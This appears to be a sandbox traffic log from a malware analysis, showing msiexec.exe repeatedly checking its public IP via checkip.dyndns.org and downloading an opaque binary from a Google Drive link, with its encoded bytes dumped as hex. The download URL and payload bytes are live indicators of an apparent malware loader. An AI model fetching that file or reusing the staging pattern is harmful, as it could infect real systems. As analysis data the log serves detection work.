    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 16:33:26.784601927 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 16, 2024 16:33:27.192281008 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:26 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: a6f7089706c748b41534aa7a96ff0d29
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 16:33:29.720519066 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 16, 2024 16:33:30.131134033 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:29 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 2e72622e5db806f3d5e5a168721bb35e
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49818 | 193.122.6.168 | 80 | 8000 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 16:33:31.949470043 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 16, 2024 16:33:33.218835115 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:33 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 30deb6c222204f570d7e102f29fd05bf
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49828 | 158.101.44.242 | 80 | 8000 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 16:33:35.223452091 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 16, 2024 16:33:36.447566032 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:36 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: ffbe6447ec71531f243e71d9afcd7e17
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49835 | 158.101.44.242 | 80 | 8000 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 16:33:38.559715986 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 16, 2024 16:33:39.763645887 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:39 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: a8e913447a7a5e542e79ee0fddea5864
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49842        158.101.44.242  80                8000  C:\Windows\SysWOW64\msiexec.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 16, 2024 16:33:41.616498947 CET  151                OUT        GET / HTTP/1.1
                                                                   User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                   Host: checkip.dyndns.org
                                                                   Connection: Keep-Alive
Dec 16, 2024 16:33:42.841303110 CET  321                IN         HTTP/1.1 200 OK
                                                                   Date: Mon, 16 Dec 2024 15:33:42 GMT
                                                                   Content-Type: text/html
                                                                   Content-Length: 104
                                                                   Connection: keep-alive
                                                                   Cache-Control: no-cache
                                                                   Pragma: no-cache
                                                                   X-Request-ID: 415812684ed01dc7cf04e502814ad29e
                                                                   Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                   Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49853        158.101.44.242  80                8000  C:\Windows\SysWOW64\msiexec.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 16, 2024 16:33:45.096046925 CET  151                OUT        GET / HTTP/1.1
                                                                   User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                   Host: checkip.dyndns.org
                                                                   Connection: Keep-Alive
Dec 16, 2024 16:33:46.300425053 CET  321                IN         HTTP/1.1 200 OK
                                                                   Date: Mon, 16 Dec 2024 15:33:46 GMT
                                                                   Content-Type: text/html
                                                                   Content-Length: 104
                                                                   Connection: keep-alive
                                                                   Cache-Control: no-cache
                                                                   Pragma: no-cache
                                                                   X-Request-ID: 09fb8e73e7eda48039e7611cf571b2e3
                                                                   Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                   Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.4  49861        158.101.44.242  80                8000  C:\Windows\SysWOW64\msiexec.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 16, 2024 16:33:48.409517050 CET  151                OUT        GET / HTTP/1.1
                                                                   User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                   Host: checkip.dyndns.org
                                                                   Connection: Keep-Alive
Dec 16, 2024 16:33:49.648853064 CET  321                IN         HTTP/1.1 200 OK
                                                                   Date: Mon, 16 Dec 2024 15:33:49 GMT
                                                                   Content-Type: text/html
                                                                   Content-Length: 104
                                                                   Connection: keep-alive
                                                                   Cache-Control: no-cache
                                                                   Pragma: no-cache
                                                                   X-Request-ID: 25ac2d1c58594637463526a056bf4f35
                                                                   Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                   Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.4  49870        158.101.44.242  80                8000  C:\Windows\SysWOW64\msiexec.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 16, 2024 16:33:51.961927891 CET  151                OUT        GET / HTTP/1.1
                                                                   User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                   Host: checkip.dyndns.org
                                                                   Connection: Keep-Alive
Dec 16, 2024 16:33:53.168433905 CET  321                IN         HTTP/1.1 200 OK
                                                                   Date: Mon, 16 Dec 2024 15:33:52 GMT
                                                                   Content-Type: text/html
                                                                   Content-Length: 104
                                                                   Connection: keep-alive
                                                                   Cache-Control: no-cache
                                                                   Pragma: no-cache
                                                                   X-Request-ID: 409e112eb5d82c3adf725a5efec161e7
                                                                   Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                   Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49778        172.217.19.174  443               8000  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-16 15:33:18 UTC  216                OUT        GET /uc?export=download&id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Host: drive.google.com
                                                       Cache-Control: no-cache
2024-12-16 15:33:19 UTC  1920               IN         HTTP/1.1 303 See Other
                                                       Content-Type: application/binary
                                                       Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                       Pragma: no-cache
                                                       Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                       Date: Mon, 16 Dec 2024 15:33:18 GMT
                                                       Location: https://drive.usercontent.google.com/download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download
                                                       Strict-Transport-Security: max-age=31536000
                                                       Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                       Cross-Origin-Opener-Policy: same-origin
                                                       Content-Security-Policy: script-src 'nonce-vi4HQAdU2Jh5xRb1Uh1nVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                       Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                       Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                       Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                       Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                       Server: ESF
                                                       Content-Length: 0
                                                       X-XSS-Protection: 0
                                                       X-Frame-Options: SAMEORIGIN
                                                       X-Content-Type-Options: nosniff
                                                       Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49784        142.250.181.97  443               8000  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-16 15:33:21 UTC  258                OUT        GET /download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                       Cache-Control: no-cache
                                                       Host: drive.usercontent.google.com
                                                       Connection: Keep-Alive
2024-12-16 15:33:24 UTC  4929               IN         HTTP/1.1 200 OK
                                                       X-GUploader-UploadID: AFiumC7JfEhrf97rK7CpxzqBRHyNj03_ndBFjNF-nQ2Gsu7o_OFzDeXNnVRHGYycsClQXa_1
                                                       Content-Type: application/octet-stream
                                                       Content-Security-Policy: sandbox
                                                       Content-Security-Policy: default-src 'none'
                                                       Content-Security-Policy: frame-ancestors 'none'
                                                       X-Content-Security-Policy: sandbox
                                                       Cross-Origin-Opener-Policy: same-origin
                                                       Cross-Origin-Embedder-Policy: require-corp
                                                       Cross-Origin-Resource-Policy: same-site
                                                       X-Content-Type-Options: nosniff
                                                       Content-Disposition: attachment; filename="knXjO172.bin"
                                                       Access-Control-Allow-Origin: *
                                                       Access-Control-Allow-Credentials: false
                                                       Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                       Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                       Accept-Ranges: bytes
                                                       Content-Length: 277056
                                                       Last-Modified: Mon, 16 Dec 2024 10:56:37 GMT
                                                       Date: Mon, 16 Dec 2024 15:33:23 GMT
                                                       Expires: Mon, 16 Dec 2024 15:33:23 GMT
                                                       Cache-Control: private, max-age=0
                                                       X-Goog-Hash: crc32c=1qmqgg==
                                                       Server: UploadServer
                                                       Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                       Connection: close
2024-12-16 15:33:24 UTC  4929               IN         Data Raw: cb dc ba c4 de 75 51 4b e3 04 ba 09 78 75 e5 4e 56 ef 38 26 ed 1d b3 da fc 29 fe 35 75 94 7e 54 f7 c3 2b 8e e3 bc be ed 23 69 48 d7 17 47 2b d5 09 3e fe b8 05 4e 60 d1 a1 0d a7 8f 2f a2 4a 0b 72 d6 ff b5 eb 94 0e 19 4b 5c d7 72 36 2e de ee f5 2b a3 e0 aa 1d 4d b3 04 f2 ac db 2a fa ee ec 4b 83 76 e8 a3 7c 8c e2 b1 4c b5 40 59 ab 39 ae 84 9c fa 20 f0 61 d7 ef da 49 43 d8 f7 21 a1 46 fc 1e ff f5 5c 4f 4f 10 39 37 41 6c d8 e2 7e 2d c5 d0 64 93 75 b6 5d 91 b9 8b 59 fd b9 70 03 84 01 e6 80 9e 91 85 31 7f 75 87 e1 9c 1e e8 65 3a cc 29 07 c2 ff 14 c4 34 2d 28 9e a2 b6 d2 36 91 15 ab 7b 7e 84 3f d0 40 59 dc bd 78 b9 92 35 ad d4 c9 fa 01 e5 dd bc 0c 0d f4 94 f9 fb 1a 04 63 7c a1 e1 bb 92 9e fd ce 1c 35 54 7f 26 af c2 f1 4e 1f 2d cb 5f 09 96 b0 20 9b 45 86 05 f4 c3
                                                       Data Ascii: uQKxuNV8&)5u~T+#iHG+>N`/JrK\r6.+M*Kv|L@Y9 aIC!F\OO97Al~-du]Yp1ue:)4-(6{~?@Yx5c|5T&N-_ E
2024-12-16 15:33:24 UTC  4840               IN         Data Raw: f8 69 a7 f8 fe 8c 21 25 7e f1 fc 1d 36 5b 11 51 c1 40 27 5f 55 6a 4a 76 e3 2f d2 3b ec 6e 6d 3c 89 c7 8a 9d 03 67 e1 05 04 17 7c d3 71 50 41 3b 1d d8 2e d9 e3 30 d6 a8 7c 27 55 76 a2 61 90 68 95 83 64 07 08 b9 a0 11 87 f0 2d 4b c7 f5 4f d8 69 a4 84 17 6e a0 28 4a b9 ef 01 e2 cb 6a ac 99 9c e4 2d 8e a8 38 42 39 e6 24 f0 1b 53 1c 34 7d ec f0 03 24 0e ff cb 2e 77 ff c4 85 31 f2 2c 39 61 c7 35 7e 50 55 cb 68 4d 9d ef 00 37 75 5f 60 a5 d2 fb 66 33 79 df 15 0e 23 00 74 95 34 73 7c 21 6c e9 b9 de 6d 16 36 46 3a 17 44 fd b4 c5 12 6b 9a 63 df bd 72 49 6e 7b 79 1b d2 67 87 86 02 aa 39 27 50 cc 19 c7 95 5c 4e c0 cb cb 84 dd b3 de 53 67 1c d4 9e 55 0d 17 73 fc ad bf ab df 48 02 49 59 50 20 5e d5 d3 05 9a 00 5f 84 f1 51 d6 4d 87 40 4e 83 8c 2f 0a 8f a6 34 41 2c 56 c4
                                                       Data Ascii: i!%~6[Q@'_UjJv/;nm<g|qPA;.0|'Uvahd-KOin(Jj-8B9$S4}$.w1,9a5~PUhM7u_`f3y#t4s|!lm6F:DkcrIn{yg9'P\NSgUsHIYP ^_QM@N/4A,V
2024-12-16 15:33:24 UTC  1322               IN         Data Raw: 9f 2a 93 3b 26 1d ed 6f 45 b5 86 27 bd 04 cb 93 87 9f 40 89 11 4c 66 2e f2 32 d4 95 a2 26 a6 15 89 54 dd 63 ea b7 4a d6 df ec fa 39 29 2f c4 c7 41 7a 3a 4e 59 af b8 5a a8 96 00 3f 5d b1 58 79 12 7b 80 f1 19 c1 7c e9 29 eb c6 a2 04 13 4a bc f8 de 4a 6a c8 08 79 cc e6 c5 e3 8d 60 48 33 60 fe 59 af 94 d6 47 6a 62 08 51 30 d7 50 d1 62 50 28 70 ff e0 53 63 d8 02 ca d6 da 29 89 91 6e 8c 39 85 4c 53 ec 6a de bd 6d ea 63 ad 57 8b 91 e1 09 e6 1d 1f be fa 8a 7e ef 40 63 e6 07 83 ad 4e cb c0 2f 04 4a fb 38 18 f7 ff af a3 04 91 8e 40 d6 04 c0 6a e1 65 ac 2d 2b 4e ab 6a 21 23 95 95 c7 04 8a 72 b2 3c f8 e7 08 c9 1f 27 83 c0 88 f3 67 3b fe d3 1d 9e fd 90 c3 c9 3a 48 11 51 bb fb 63 93 e4 a5 b8 e2 b1 48 3e 7f d0 f4 b4 ed 4e 34 e7 88 bd de 8c 41 09 55 5d fd 55 25 32 e1 ac
                                                       Data Ascii: *;&oE'@Lf.2&TcJ9)/Az:NYZ?]Xy{|)JJjy`H3`YGjbQ0PbP(pSc)n9LSjmcW~@cN/J8@je-+Nj!#r<'g;:HQcH>N4AU]U%2
2024-12-16 15:33:24 UTC  1390               IN         Data Raw: 6d a7 b6 a1 41 57 ab d7 59 7b 16 66 70 f7 53 fb ba 2d 1d d2 d2 51 0f f4 ad 70 cc 50 6f fb 35 74 f8 f2 39 75 46 ee 75 17 4a 77 d0 d3 af f1 43 59 84 8b 12 75 00 42 5a 17 b9 61 b3 e9 f2 0a 0a d0 a3 ee 21 2f 1b 73 fc 1d 16 48 30 0b 00 00 27 5d 54 4f 5c 5e 10 3d d2 7c 4f 4b 7a 85 3c c7 8a 99 a1 42 f9 77 63 18 7c a1 d3 75 58 e8 24 d8 2e c6 41 15 cc 12 4c 24 55 08 00 49 e5 68 95 89 77 25 1e 91 d6 10 87 fa 2d bc c6 f9 4f 00 40 d3 84 07 64 a0 28 71 86 ef 00 fd ea 48 de 09 8f e4 5d e3 b7 38 53 3d ce 45 93 1b 59 07 1d 04 84 aa 03 20 2c c2 a4 72 71 ff 10 fa 70 da 18 33 61 ca 39 4d dd 22 a9 68 4c f8 54 00 37 7f 5f 19 95 bd 9d 62 41 e6 da 7a 19 35 28 ff fa 5c 79 6a d5 61 fa ee a6 49 3a 60 48 b3 57 55 f9 bd f7 77 73 d7 6c d5 de d5 6c 68 56 be 70 d2 6d 2f b0 1c c9 58 2a
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 6d a7 b6 a1 41 57 ab d7 59 7b 16 66 70 f7 53 fb ba 2d 1d d2 d2 51 0f f4 ad 70 cc 50 6f fb 35 74 f8 f2 39 75 46 ee 75 17 4a 77 d0 d3 af f1 43 59 84 8b 12 75 00 42 5a 17 b9 61 b3 e9 f2 0a 0a d0 a3 ee 21 2f 1b 73 fc 1d 16 48 30 0b 00 00 27 5d 54 4f 5c 5e 10 3d d2 7c 4f 4b 7a 85 3c c7 8a 99 a1 42 f9 77 63 18 7c a1 d3 75 58 e8 24 d8 2e c6 41 15 cc 12 4c 24 55 08 00 49 e5 68 95 89 77 25 1e 91 d6 10 87 fa 2d bc c6 f9 4f 00 40 d3 84 07 64 a0 28 71 86 ef 00 fd ea 48 de 09 8f e4 5d e3 b7 38 53 3d ce 45 93 1b 59 07 1d 04 84 aa 03 20 2c c2 a4 72 71 ff 10 fa 70 da 18 33 61 ca 39 4d dd 22 a9 68 4c f8 54 00 37 7f 5f 19 95 bd 9d 62 41 e6 da 7a 19 35 28 ff fa 5c 79 6a d5 61 fa ee a6 49 3a 60 48 b3 57 55 f9 bd f7 77 73 d7 6c d5 de d5 6c 68 56 be 70 d2 6d 2f b0 1c c9 58 2a
                                                                                                                                                                          Data Ascii: mAWY{fpS-QpPo5t9uFuJwCYuBZa!/sH0']TO\^=|OKz<Bwc|uX$.AL$UIhw%-O@d(qH]8S=EY ,rqp3a9M"hLT7_bAz5(\yjaI:`HWUwsllhVpm/X*
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 0a 4d 17 21 67 87 69 7a f8 ef 2a f2 41 69 fa e8 f1 25 02 6d 85 db 45 b7 71 1d 88 3f 88 1c 58 e8 94 04 0a 48 4d d1 1d 18 d1 de e4 5c 2c cc 33 aa 1d 47 b3 3a ce ac db 2e 89 27 ec 4b 89 65 e0 dd 4d 8c e2 b5 3e 20 42 59 db 2f 86 05 9c fa 2a e6 9f d6 fc d3 58 4a f4 7b 30 a9 51 9d cb 45 fb 56 fb 46 f6 13 8f 51 28 03 ac e0 45 ac a9 44 e3 16 d1 44 dd d8 e6 7d b6 13 1e 6d e1 1a 0a e2 fb bb f7 55 19 2b d4 8f bc 5e d9 0d 1a a1 42 10 1b d1 19 c3 51 c4 28 9e a8 b6 c3 3e 80 43 81 b5 7e c8 34 d3 51 86 36 e2 1e b9 98 35 85 b0 c9 fa 07 05 03 ae 28 2e c1 c4 f9 f1 2d 0a 63 54 d7 e1 bb 98 40 fd ce 42 76 2e 4a 26 8f c6 83 db 7d 29 bb 49 21 57 b0 20 b1 53 78 04 e5 c8 1d b2 5f a5 ff a7 82 bc 6e f6 d6 ad 4c fd d6 a3 48 6c 15 27 01 eb f5 bc 97 bd fa db 0b de d2 32 ca 98 7f 3b ca
                                                                                                                                                                          Data Ascii: M!giz*Ai%mEq?XHM\,3G:.'KeM> BY/*XJ{0QEVFQ(EDD}mU+^BQ(>C~4Q65(.-cT@Bv.J&})I!W Sx_nLHl'2;
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 6b e5 31 09 8e 9f 40 ca 76 a9 45 f8 2e e3 f5 6e 26 ac 9d 09 23 72 82 f5 6a 97 a7 03 73 0d a3 fb b7 ad e3 53 fe 91 c7 41 4a 7c e0 f3 95 d2 9f 20 8a 28 d8 34 84 68 7c 9b 5a 79 bb 10 1b c6 87 9f 3f 93 3c 4c 62 56 15 1b c4 e5 c4 19 aa 16 89 5e ca b8 fd da 08 c7 d9 d1 11 3f 29 2f bc 87 f8 7a 3e 36 58 98 ad 2a ce 96 da 3f 5d b1 30 cc 13 68 83 c8 54 f8 4c e2 57 f4 c6 b6 fe 3d 3d bc f8 d2 9b be dc 1c 5b 5e 27 c5 e9 f3 e3 3b f1 61 f2 53 b4 ee ae 5f 14 28 67 ea 34 a4 99 d1 6a 24 05 b4 ff e4 27 20 c9 0a a1 60 66 29 83 e5 3c 31 39 81 29 95 c4 30 d4 bd 76 ff 9c 74 47 8b e0 ec ab 94 06 00 cc 25 38 5b 88 40 8c e6 07 83 60 ac d3 b2 42 0b 5b 83 87 b0 ae 81 97 a2 21 83 5e 28 c3 76 3b c7 c4 02 26 bc 30 30 bd c8 04 3f 88 1c c8 04 f0 72 b2 39 f4 98 1c c9 6b 27 8e af fa 78 62
                                                                                                                                                                          Data Ascii: k1@vE.n&#rjsSAJ| (4h|Zy?<LbV^?)/z>6X*?]0hTLW==[^';aS_(g4j$' `f)<19)0vtG%8[@`B[!^(v;&00?r9k'xb
